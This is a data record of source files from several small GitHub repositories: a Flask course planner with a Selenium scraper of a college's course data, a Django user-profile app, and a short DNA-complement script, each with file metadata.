toggledElts.forEach((elt) => {\n elt.classList.toggle('hidden')\n })\n toggledElts = []\n\n const data = JSON.parse(course)\n var title = document.getElementById('modalTitle').innerText = 'Add ' + data['Course Number']\n\n var geToId = {\n 'Breadth Area': 'areaReq',\n 'Physical Education': 'peReq',\n 'Language': 'langReq',\n 'Analyzing Difference': 'analyzingReq',\n 'Speaking Intensive': 'speakingReq',\n 'Writing Intensive': 'writingReq'\n }\n\n Object.keys(data).forEach((ge) => {\n if (ge === 'Course Title' || ge === 'Course Number' || !data[ge]) {\n return // this is foreach continue\n }\n const tagId = geToId[ge]\n toggledElts.push(toggleElt(tagId, tagId === 'areaReq' ? data[ge] : null))\n })\n if (!toggledElts.length) {\n toggledElts.push(toggleElt('reqsNone'))\n }\n } \n}\n\nfunction toggleElt(tagId, area=null) {\n var elt = document.getElementById(tagId)\n if (area) {\n elt.innerText = area\n }\n elt.classList.toggle('hidden')\n return elt\n}\n\n$('#addCourse').click(function() {\n var selectedSem = $('#semSelect option:selected').text()\n var selectedCourse = window.selectedCourse\n\n $.ajax({\n type: \"POST\",\n url: \"addCourse\",\n data: JSON.stringify({\n 'sem': selectedSem,\n 'course': selectedCourse\n }),\n contentType: \"application/json; charset=utf-8\",\n dataType: \"json\",\n success: function(response) {\n location.reload();\n }\n })\n});" }, { "alpha_fraction": 0.6922268867492676, "alphanum_fraction": 0.7163865566253662, "avg_line_length": 24.756755828857422, "blob_id": "965207184381463b9ce5d06019cfabbcb20fbc48", "content_id": "b8803bf56956ebf0861963aeb48cdb83fe6f22c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 952, "license_type": "no_license", "max_line_length": 135, "num_lines": 37, "path": "/README.md", "repo_name": "GPAlzate/SageSchedule", "src_encoding": "UTF-8", "text": "# CSCI181: Final Project\n## Gabe Alzate, Samuel So\n\nProject Outline\n\n1. 
Gather course information from 2021-2022 course catalog.\n - reach out to registrar for dependencies\n - if not, either i) hard-code information, ii) scrape from course-catalog using NLP techniques (e.g., regex search \"pre-requisite\")\n\n2. Map out \"front-end\"\n - Map out user interactions \n\nSemester-to-semester course schedule\n1. add/remove courses\n2. checkbox of requirements (fulfilled as courses are added)\n - foreign language\n - pe\n - breadth (areas 1-6)\n - overlays (speaking, writing, analyzing difference)\n - ID1\n3. customizable number of units\n4. valid schedule? (dependencies (pre-reqs), and if current schedule, timing)\n\nTO DO NEXT\n1. Search function \n a. \"fuzzier\" functionality\n b. based on course description\n c. \n2. Add to schedule\n3. Course list: put area/breadth requirements concisely\n\nThings to run:\n\n```\nflask run\npnpm run tw:build\n```" }, { "alpha_fraction": 0.6190476417541504, "alphanum_fraction": 0.6230435967445374, "avg_line_length": 29.64285659790039, "blob_id": "2de80549a6900d442da6047052b7b289849511c9", "content_id": "e889f53e3ff8ad273a1b58bec967b58eb00766b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3003, "license_type": "no_license", "max_line_length": 83, "num_lines": 98, "path": "/app.py", "repo_name": "GPAlzate/SageSchedule", "src_encoding": "UTF-8", "text": "#\n# The main driver of the academic planner app\n#\nfrom src.scraper import get_courses\n\nimport os\nimport re\nimport json\n\nfrom flask import Flask, redirect, render_template, request, session, jsonify\n\nSCHOOL_YEAR = 21\nNUM_SEMS = 8\n\napp = Flask(__name__)\napp.secret_key = 'all our celebrities keep dying'\n\ndf = get_courses()\n\ndef create_semesters():\n semesters = []\n for i in range(NUM_SEMS):\n # create a dictionary of semesters in session\n # each sem will store the courses selected by the user\n sem = f\"{'Spring' if i % 2 else 'Fall'} '{SCHOOL_YEAR + (i + 1)//2}\"\n semesters.append(sem)\n session[sem] = []\n\n # save the dictionary of semester strings\n session['semesters'] = semesters\n\n# The home page\n@app.route('/')\ndef index():\n # session.clear()\n if 'school_year' not in session:\n session['school_year'] = SCHOOL_YEAR\n if 'semesters' not in session:\n session['num_sems'] = NUM_SEMS\n create_semesters()\n if 'breadth_reqs' not in session:\n session['breadth_reqs'] = [None] * 6\n if 'overlay_reqs' not in session:\n session['overlay_reqs'] = {\n 'Analyzing Difference' : None,\n 'Writing Intensive' : None,\n 'Speaking Intensive' : None\n }\n for n in session:\n print(f'{n}:{session[n]}')\n return render_template('index.html', courses=None)\n\n@app.route('/search')\ndef search():\n q = request.args.get('q')\n courses = None\n if q:\n # split query by non-alphanum characters\n keywords = re.split('[^a-zA-Z0-9]', q)\n\n # regex query: contains all of the keywords\n pattern = ''.join([f\"(?=.*{w})\" for w in keywords]) + \".+\"\n courses = df[\n df['Course Title'].str.contains(pattern, regex=True, case=False) |\n df['Course Number'].str.contains(pattern, regex=True, case=False)\n ]\n \n return render_template('index.html', courses=courses)\n\n@app.route('/addCourse', methods=['POST'])\ndef addCourse():\n data = request.get_json()\n sem = data['sem']\n course = json.loads(data['course'])\n\n # add course to session\n session[sem].append(course)\n\n # update fulfilled breadth reqs\n area = course['Breadth Area']\n num = int(course['Breadth Area'][-1]) if area else None\n if num and not 
session['breadth_reqs'][num-1]:\n session['breadth_reqs'][num -1] = course\n\n # update overlays (a course can only fulfill one overlay)\n overlay_reqs = session['overlay_reqs']\n if not overlay_reqs['Analyzing Difference'] and course['Analyzing Difference']:\n overlay_reqs['Analyzing Difference'] = course\n elif not overlay_reqs['Writing Intensive'] and course['Writing Intensive']:\n overlay_reqs['Writing Intensive'] = course\n elif not overlay_reqs['Speaking Intensive'] and course['Speaking Intensive']:\n overlay_reqs['Speaking Intensive'] = course\n\n session.modified = True\n return course\n\nif __name__== '__main__':\n app.run(debug=True)\n" }, { "alpha_fraction": 0.6256777048110962, "alphanum_fraction": 0.6310995221138, "avg_line_length": 32.4202880859375, "blob_id": "929b79a76e4e0ddd8f2b350c642d001113772065", "content_id": "73093d71d6f93cd12f8344e264c5a1a43032bd54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4611, "license_type": "no_license", "max_line_length": 98, "num_lines": 138, "path": "/src/scraper.py", "repo_name": "GPAlzate/SageSchedule", "src_encoding": "UTF-8", "text": "#\n# CSCI181 Final Project: \n# Names: Gabe, Samuel So\n# \n\nimport pandas as pd\nimport numpy as np\nimport os\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import StaleElementReferenceException\n\nPOMONA_GEs_URL = (\n \"https://tableau.campus.pomona.edu/views/GEdashboardforweb/DashboardforWeb?\"\n \":embed=y&:display_count=n&:origin=viz_share_link&:showVizHome=n\"\n)\n\ndef get_browser():\n # chrome options: set the download destination to current directory\n chromeOptions = webdriver.ChromeOptions()\n prefs = {\"download.default_directory\" : os.path.abspath('.')}\n chromeOptions.add_experimental_option(\"prefs\",prefs)\n\n # don't open browser window\n chromeOptions.add_argument('headless')\n chromeOptions.add_argument('window-size=1200x600')\n return webdriver.Chrome(executable_path='./static/chromedriver', options=chromeOptions)\n\ndef selenium_click_download(driver, wait):\n # click download\n download_path = '//*[@id=\"download-ToolbarButton\"]'\n driver.find_element_by_xpath(download_path).click()\n\n # select the crosstab option (allows to download excel/csv)\n crosstab_path = '//*[@id=\"DownloadDialog-Dialog-Body-Id\"]/div/fieldset/button[3]'\n wait.until(\n EC.presence_of_element_located(\n (By.XPATH, crosstab_path)\n )\n ).click()\n\n # pick the \"Course List\" spreadsheet\n course_list_path = (\n '//*[@id=\"export-crosstab-options-dialog-Dialog-BodyWrapper-Dialog-Body-Id\"]'\n '/div/div[1]/div[2]/div/div/div[7]/div/div/div' \n )\n wait.until(\n EC.presence_of_element_located(\n (By.XPATH, course_list_path)\n )\n ).click()\n\n # and finally download (excel)\n final_download = (\n '//*[@id=\"export-crosstab-options-dialog-Dialog-BodyWrapper-Dialog-Body-Id\"]'\n '/div/div[3]/button'\n )\n driver.find_element_by_xpath(final_download).click()\n\ndef download_tableau_courses():\n\n # open driver and create explicit waiter object\n driver = get_browser()\n driver.get(POMONA_GEs_URL)\n wait = WebDriverWait(driver, 10)\n\n try:\n # click clear all\n print(\"Clearing filters...\")\n clear_all_path = \"//*[@id='tabZoneId17']/div/div/div\"\n wait.until(\n EC.visibility_of_element_located(\n (By.XPATH, clear_all_path)\n )\n ).click()\n\n # get 
all the dropdowns. we can't get just one because the ids are always changing\n print(\"Waiting for updated courses...\")\n discipline_path = (\n \"//*[starts-with(@id, 'tab-ui-id-') and \"\n \"@class='tabComboBoxName' and \"\n \"text()='(All)']\"\n )\n\n # wait for there to be 3 '(All)' fields\n wait.until(\n EC.presence_of_element_located(\n (By.XPATH, f\"({discipline_path})[2]\")\n )\n )\n \n except Exception as e:\n print(e)\n print(\"An error occurred trying to filter the data.\")\n\n # StaleElement expected here for the first download attempt. this while loop simply retries\n # three more times (should work after the next attempt)\n print(\"Downloading Course List.xlsx...\")\n max_attempts = 3\n while max_attempts:\n try:\n selenium_click_download(driver, wait)\n print(\"Courses successfully downloaded.\", end=\"\")\n return\n except StaleElementReferenceException as s:\n if max_attempts < 3:\n print(s)\n print(\"Download error occurred. Trying again...\")\n max_attempts -= 1\n \n print(\"Too many attempts. Closing...\")\n\ndef get_courses():\n # if course list isn't there already, get it\n if not os.path.exists('Course List.xlsx'):\n # scrape GEs from Tableau. Done by physically downloading the excel spreadsheet of courses\n print(\"Scraping GEs...\")\n\n # download the excel spreadsheet of courses\n download_tableau_courses()\n\n print(\"Getting courses...\", end=\"\")\n while not os.path.exists('Course List.xlsx'):\n print(\".\", end=\"\")\n time.sleep(1)\n print(\" Success!\")\n \n df = pd.read_excel('Course List.xlsx')\n\n # remove rows with n/a course number and change whitespace to nan\n df_clean = df.dropna(subset=['Course Number']).replace(r'^\\s*$', np.nan, regex=True)\n\n # drop redundant columns\n return df_clean.drop(columns=['Language Requirement', 'Breadth Area Description'])" } ]
4
Pardeepjakhar/DRS
https://github.com/Pardeepjakhar/DRS
0fad0d39e5fc845ce82e718dbc76a9f97f40453e
9ffb18f40be46e32f4331d0cac4449f79afa5946
c699ff488aa89ffbffb7a91633b10f210a4f8dec
refs/heads/master
2023-01-29T00:28:21.916909
2020-11-23T14:46:43
2020-11-23T14:46:43
315,348,114
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7653239965438843, "alphanum_fraction": 0.7880910634994507, "avg_line_length": 26.238094329833984, "blob_id": "7d2fd4a7a8411058890ce88d58e7b3caa2406d8d", "content_id": "83e192a6b66320259c2539492a7a241dd8890bd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 571, "license_type": "no_license", "max_line_length": 72, "num_lines": 21, "path": "/main/main/main.py", "repo_name": "Pardeepjakhar/DRS", "src_encoding": "UTF-8", "text": "import tkinter\nimport cv2\nimport PIL.Image,PIL.ImageTk\nfrom functools import partial\nimport threading \nimport time\nimport imutils\n\n#set width and height of screen\nSET_WIDTH=650\nSET_HEIGHT=368\n\n#Tkinder gui start here\nwindow = tkinter.TK()\nwindow.title(\"DRS System by pardeep jakhar\")\ncv_img=cv2.cvtColor(cv2.imread(\"logo.png\"), cv2.COLOR_BGR2RGB)\ncanvas=tkinter.Canvas(window,width=SET_WIDTH,height=SET_HEIGHT)\nphoto=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))\nimage_on_canvas=canvas.create_image(0, 0, ancho=tkinter.NW, image=photo)\ncanvas.pack()\nwindow.mainloop()" }, { "alpha_fraction": 0.6827924251556396, "alphanum_fraction": 0.7048377394676208, "avg_line_length": 30.114286422729492, "blob_id": "670a73d64b8c7b550dc35cc140c6f631c9630812", "content_id": "0c3dd2cd179aaa574675b8784f22f19fb1523325", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3266, "license_type": "no_license", "max_line_length": 93, "num_lines": 105, "path": "/drsmain.py", "repo_name": "Pardeepjakhar/DRS", "src_encoding": "UTF-8", "text": "import tkinter\nimport cv2\nimport PIL.Image,PIL.ImageTk\nfrom functools import partial\nimport threading\nimport time\nimport imutils\n\nstream=cv2.VideoCapture(\"clip2.mp4\")\nflag = True\ndef play(speed):\n global flag\n print(f\"play speed is {speed}\")\n frame1=stream.get((cv2.CAP_PROP_POS_FRAMES))\n stream.set(cv2.CAP_PROP_POS_FRAMES,frame1+speed)\n\n grabbed,frame= stream.read()\n if not grabbed:\n exit()\n frame=imutils.resize(frame, width=SET_WIDTH,height=SET_HEIGHT)\n frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))\n canvas.image=frame\n canvas.create_image(0,0,image=frame, anchor=tkinter.NW)\n if flag:\n canvas.create_text(134,26,fill=\"black\",font=\" Time 26 bold\", text=\"Decision Pending\")\n flag=not flag\n\ndef pending(decision):\n # Display decisiom pending image\n frame=cv2.cvtColor(cv2.imread(\"pending.png\"),cv2.COLOR_BGR2RGB)\n frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)\n frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))\n canvas.image = frame\n canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)\n\n # wait for 1 second\n time.sleep(2)\n\n #Display sponser image\n frame = cv2.cvtColor(cv2.imread(\"logo.png\"), cv2.COLOR_BGR2RGB)\n frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)\n frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))\n canvas.image = frame\n canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)\n\n # wait for 1 second\n time.sleep(2.5)\n\n # Display out / not_out decision\n if decision==\"out\":\n decisionImg=\"out.png\"\n else:\n decisionImg=\"not-out.png\"\n\n frame = cv2.cvtColor(cv2.imread(decisionImg), cv2.COLOR_BGR2RGB)\n frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)\n frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))\n canvas.image = frame\n canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)\n\n\ndef not_out():\n 
thread = threading.Thread(target=pending, args=(\" not_out\",))\n thread.daemon = 1\n thread.start()\n print(\"you are not_out\")\n\ndef out():\n thread=threading.Thread(target=pending,args=(\"out\",))\n thread.daemon=1\n thread.start()\n print(\"You are out \")\n\n#set width and height of screen\nSET_WIDTH=650\nSET_HEIGHT=368\n\n#Tkinder gui start here\nwindow=tkinter.Tk()\nwindow.title(\"DRS System by pardeep jakhar\")\ncv_img=cv2.cvtColor(cv2.imread(\"logo.png\"), cv2.COLOR_BGR2RGB)\ncanvas=tkinter.Canvas(window,width=SET_WIDTH,height=SET_HEIGHT)\nphoto=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))\nimage_on_canvas=canvas.create_image(0, 0, ancho=tkinter.NW, image=photo)\ncanvas.pack()\n\n#Create button\nbtn=tkinter.Button(window,text=\"<< Previous (Fast)\", width=50 , command=partial(play,-25))\nbtn.pack()\n\nbtn=tkinter.Button(window,text=\"<< Previous (Slow)\", width=50, command=partial(play,-2))\nbtn.pack()\n\nbtn=tkinter.Button(window,text=\" Next (Fast) >>\", width=50, command=partial(play,25))\nbtn.pack()\n\nbtn=tkinter.Button(window,text=\" Next (Slow) >>\", width=50, command=partial(play,2))\nbtn.pack()\n\nbtn=tkinter.Button(window,text=\" Give Not Out\", width=50,command= not_out)\nbtn.pack()\n\nbtn=tkinter.Button(window,text=\" Give Out \", width=50,command= out)\nbtn.pack()\nwindow.mainloop()" } ]
2
See2-io/see2_web
https://github.com/See2-io/see2_web
e2af9008ac27a631dbddb474d08a986ca96c029d
293dace81fd90e7a328086b1443c9cabaafc813b
e07b8350eadfa29cea64e75bf195c59c862c0501
refs/heads/master
2022-12-10T21:40:05.179593
2019-09-03T17:57:22
2019-09-03T17:57:22
183,510,906
0
1
null
2019-04-25T21:16:13
2019-09-03T18:02:03
2022-12-08T06:06:44
JavaScript
[ { "alpha_fraction": 0.6952054500579834, "alphanum_fraction": 0.6952054500579834, "avg_line_length": 19.85714340209961, "blob_id": "a2e4af8d69a130477409e6c9a48c1ca84617b598", "content_id": "cbf5557942d729fb66f72877f9e8c0d1f5232100", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 292, "license_type": "no_license", "max_line_length": 55, "num_lines": 14, "path": "/users/apps.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass UsersConfig(AppConfig):\n name = 'users'\n\n\nclass ProfilesConfig(AppConfig):\n name = 'users'\n verbose_name = _('users.profile')\n\n def ready(self):\n import users.signals # noqa\n" }, { "alpha_fraction": 0.5860822200775146, "alphanum_fraction": 0.5896972417831421, "avg_line_length": 27.012659072875977, "blob_id": "c24e9d1a4cc36eec5deb312ae429665443546026", "content_id": "9b7e99ad2c797bb9789a99aaaf3b0e1e49243cb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 75, "num_lines": 79, "path": "/users/forms.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom .models import Profile\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Div, Submit, Row, Column\n\n\nclass CustomUserCreationForm(UserCreationForm):\n\n class Meta(UserCreationForm.Meta):\n model = get_user_model()\n fields = ('email', 'username',)\n\n\nclass CustomUserChangeForm(UserChangeForm):\n\n class Meta:\n model = get_user_model()\n fields = ('email', 'username',)\n\n\n# General Settings\nclass GeneralSettingsForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['first_name', 'last_name',]\n\n\nclass CrispyGeneralSettingsForm(GeneralSettingsForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Row(\n Column('first_name', css_class='form-group col-md-6 mb-0'),\n Column('last_name', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n 'show_btc_price',\n Submit('submit', 'Save')\n )\n\n def save(self, commit=True):\n m = super(GeneralSettingsForm, self).save(commit=False)\n # do custom stuff\n\n if commit:\n m.save()\n return m\n\n\nclass ProfileSettingsForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['first_name', 'last_name',]\n\n\nclass CrispyExchangeSettingsForm(ProfileSettingsForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Row(\n Column('first_name', css_class='form-group col-md-6 mb-0'),\n Column('last_name', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n Submit('submit', 'Save')\n )\n\n def save(self, commit=True):\n m = super(ProfileSettingsForm, self).save(commit=False)\n # do custom stuff\n\n if commit:\n m.save()\n return m\n" }, { "alpha_fraction": 0.6735751032829285, "alphanum_fraction": 0.6735751032829285, "avg_line_length": 23.25, "blob_id": "af60b6cd9c1ce74594ed9f3fb22f629bb9bf50a1", "content_id": "1e5d051774759252981fd3746c15ee63cf2b47e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, 
"license_type": "no_license", "max_line_length": 71, "num_lines": 8, "path": "/users/urls.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom .views import (CrispyGeneralSettingsFormView,\n )\n\nurlpatterns = [\n path('', CrispyGeneralSettingsFormView.as_view(), name='settings'),\n]" }, { "alpha_fraction": 0.6370967626571655, "alphanum_fraction": 0.6411290168762207, "avg_line_length": 26.054546356201172, "blob_id": "2e08bb86c67e04d6b9030a09bc2a17276a1e8077", "content_id": "7f088cfda7d50caf3b9e49d046dac09367b62956", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1488, "license_type": "no_license", "max_line_length": 98, "num_lines": 55, "path": "/users/models.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom django.conf import settings\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.urls import reverse\n\nfrom . import managers\n\n\nclass CustomUser(AbstractUser):\n USERNAME_FIELD = 'username'\n REQUIRED_FIELDS = ['email',]\n\n def __str__(self):\n return self.email\n\n\nclass Profile(models.Model):\n # Relations\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n related_name='profile',\n verbose_name=_(\"User\"),\n on_delete=models.CASCADE,\n )\n # Attributes - Mandatory\n interaction = models.PositiveIntegerField(\n default=0,\n verbose_name=_(\"interaction\")\n )\n # Attributes - Optional\n # Object Manager\n objects = managers.ProfileManager()\n\n # Custom Properties\n @property\n def username(self):\n return self.user.username\n first_name = models.CharField('First Name', max_length=64, null=True, blank=True, default='',)\n last_name = models.CharField('Last Name', max_length=64, null=True, blank=True, default='',)\n\n # Meta and String\n class Meta:\n verbose_name = _(\"Profile\")\n verbose_name_plural = _(\"Profiles\")\n ordering = ('user',)\n\n # Methods\n def get_absolute_url(self):\n return reverse('settings',)\n # return reverse('settings', kwargs={'pk': self.pk})\n\n def __str__(self):\n return self.user.username\n" }, { "alpha_fraction": 0.4762396812438965, "alphanum_fraction": 0.4793388545513153, "avg_line_length": 29.28125, "blob_id": "40f3d001f9c73130a27c7d62603f379bdcb45e85", "content_id": "4750150782c9f49f761ba67e19ab33626be7abaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 968, "license_type": "no_license", "max_line_length": 77, "num_lines": 32, "path": "/templates/account/settings.html", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "{% extends '_base.html' %}\n{% load static %}\n{% load crispy_forms_tags %}\n\n{% block title %}See2 for the Digital Social Economy{% endblock title %}\n\n{% block content %}\n <div class=\"container\">\n <ul class=\"nav justify-content-center\">\n <li class=\"nav-item\">\n <a class=\"nav-link active\" href=\"\">General settings</a>\n </li>\n <li class=\"nav-item\">\n <a class=\"nav-link\" href=\"profile\">Profile</a>\n </li>\n </ul>\n\n <h1>General Settings</h1>\n <div class=\"card\">\n <div class=\"card-body\">\n <form method=\"POST\" class=\"crispy-general-settings-form\">\n {% csrf_token %}\n {{ form|crispy }}\n <button class=\"btn btn-success\" type=\"submit\">Save</button>\n </form>\n </div>\n <div class=\"card-footer\">\n </div>\n </div>\n\n </div>\n{% endblock content %}" }, 
{ "alpha_fraction": 0.5088028311729431, "alphanum_fraction": 0.5264084339141846, "avg_line_length": 28.947368621826172, "blob_id": "8007f09092080ee51ff3d906e610320352a53d18", "content_id": "0da2d6c19395d8ccf1908abe6e42402015e9d525", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 568, "license_type": "no_license", "max_line_length": 100, "num_lines": 19, "path": "/templates/dashboard/dashboard.html", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "{% extends '_base.html' %}\n{% load static %}\n\n{% block title %}See2 for the Digital Social Economy{% endblock title %}\n\n{% block content %}\n <div class=\"container\">\n <h1>See2</h1>\n <div class=\"card\">\n <img class=\"card-img-top\" src=\"images/dse-800x400.png\" alt=\"The Digital Social Economy\">\n <div class=\"card-body\">\n <p>Stuff here</p>\n </div>\n <div class=\"card-footer\">\n <small class=\"text-muted\">More stuff here</small>\n </div>\n </div>\n\n{% endblock content %}" }, { "alpha_fraction": 0.6795096397399902, "alphanum_fraction": 0.6795096397399902, "avg_line_length": 27.549999237060547, "blob_id": "8ba04d8be802c60deae4001a109b001684dfd30f", "content_id": "c8b06caa79c4fef28a169c8ebc77395cad05442f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 571, "license_type": "no_license", "max_line_length": 56, "num_lines": 20, "path": "/users/signals.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom .models import Profile\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_profile(sender, instance, created, **kwargs):\n if created:\n profile = Profile.objects.create(\n user=instance,\n first_name='your first name',\n last_name='your last name',\n )\n profile.save()\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef save_profile(sender, instance, **kwargs):\n instance.profile.save()\n" }, { "alpha_fraction": 0.6813187003135681, "alphanum_fraction": 0.6813187003135681, "avg_line_length": 30.850000381469727, "blob_id": "883a69a67662cefe7f7d15706add952939aa09c4", "content_id": "7ba5c8f1b62c7feeabd99192200f4b12689eaa0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1274, "license_type": "no_license", "max_line_length": 87, "num_lines": 40, "path": "/users/views.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import FormView, UpdateView\nfrom django.urls import reverse_lazy\nfrom .forms import (GeneralSettingsForm,\n CrispyGeneralSettingsForm,\n )\nfrom .models import Profile\n\n\nclass GeneralSettingsFormView(LoginRequiredMixin, UpdateView):\n form_class = GeneralSettingsForm\n success_url = reverse_lazy('settings')\n template_name = 'account/settings.html'\n\n\nclass CrispyGeneralSettingsFormView(LoginRequiredMixin, UpdateView):\n model = Profile\n form_class = CrispyGeneralSettingsForm\n success_url = reverse_lazy('settings')\n template_name = 'account/settings.html'\n\n def get_object(self):\n return self.request.user.profile\n\n def get_context_data(self, **kwargs):\n context = super(CrispyGeneralSettingsFormView, self).get_context_data(**kwargs)\n if self.request.POST:\n pass\n else:\n pass\n return context\n\n def form_valid(self, form):\n context = 
self.get_context_data()\n form.instance.created_by = self.request.user\n # self.object = form.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('settings',)\n" }, { "alpha_fraction": 0.5693069100379944, "alphanum_fraction": 0.5891088843345642, "avg_line_length": 19.299999237060547, "blob_id": "3960b54ff9051b28c87290d70364206b73ac7a35", "content_id": "c0efe6f2dbaed3654176666a83d4744b7a03cb5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 202, "license_type": "no_license", "max_line_length": 62, "num_lines": 10, "path": "/templates/pages/about.html", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "{% extends '_base.html' %}\n\n{% block title %}About See2{% endblock %}\n\n{% block content %}\n\n <h1>About See2</h1>\n <p>Please contact <a href=\"mailto:info@see2.io\">info@see2.io</a></p>\n\n{% endblock content %}" }, { "alpha_fraction": 0.7768166065216064, "alphanum_fraction": 0.7768166065216064, "avg_line_length": 23.08333396911621, "blob_id": "d43f329ba349df8242510b11759217d013931bcc", "content_id": "90a9f7300e7ae1bcd07abb5555f038d58720d04e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/users/admin.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth import get_user_model\n\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom .models import Profile\n\n\nclass CustomUserAdmin(UserAdmin):\n add_form = CustomUserCreationForm\n form = CustomUserChangeForm\n model = get_user_model()\n list_display = ['email', 'username',]\n\n\nadmin.site.register(get_user_model(), CustomUserAdmin)\n\n\n# Register your models here.\nclass ProfileAdmin(admin.ModelAdmin):\n pass\n\n\nadmin.site.register(Profile, ProfileAdmin)\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 6.5, "blob_id": "21f5fac38099f76056ef867fcd373e14f3799107", "content_id": "46cdc88480063aed8049232005270c59fc0d14a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 15, "license_type": "no_license", "max_line_length": 10, "num_lines": 2, "path": "/README.md", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "# See2 Web\nTBD\n" } ]
11
gum5000/DNA-Pride
https://github.com/gum5000/DNA-Pride
3333251c1d615b623011e7042033a29fc8d66643
f59d06836f07e3bb73be7281d9354aff59717f1a
11a85ae18cbf8320ee2258a874ddad415fef79b7
refs/heads/master
2022-07-08T04:16:40.091161
2020-05-11T21:45:36
2020-05-11T21:45:36
263,165,139
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5538461804389954, "alphanum_fraction": 0.5538461804389954, "avg_line_length": 19.526315689086914, "blob_id": "887f25ea6201f60ef34d69a834e13e7aeb97f257", "content_id": "0c342f77d3764d1b8d5fd88b133963f89068334c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 390, "license_type": "no_license", "max_line_length": 39, "num_lines": 19, "path": "/Main.py", "repo_name": "gum5000/DNA-Pride", "src_encoding": "UTF-8", "text": "numOfCases = int(input())\nfor i in range(numOfCases):\n\tcaseSize = int(input())\n\tDNA = input()\n\t\n\tif(\"U\" in DNA):\n\t\tprint(\"Error RNA nucleobases found!\")\n\telse:\n\t\tDNAPair = \"\"\n\t\tfor j in range(caseSize):\n\t\t\tif(\"A\" in DNA[j]):\n\t\t\t\tDNAPair += \"T\"\n\t\t\telif(\"T\" in DNA[j]):\n\t\t\t\tDNAPair += \"A\"\n\t\t\telif(\"C\" in DNA[j]):\n\t\t\t\tDNAPair += \"G\"\n\t\t\telif(\"G\" in DNA[j]):\n\t\t\t\tDNAPair += \"C\"\n\t\tprint(DNAPair)\n" } ]
1
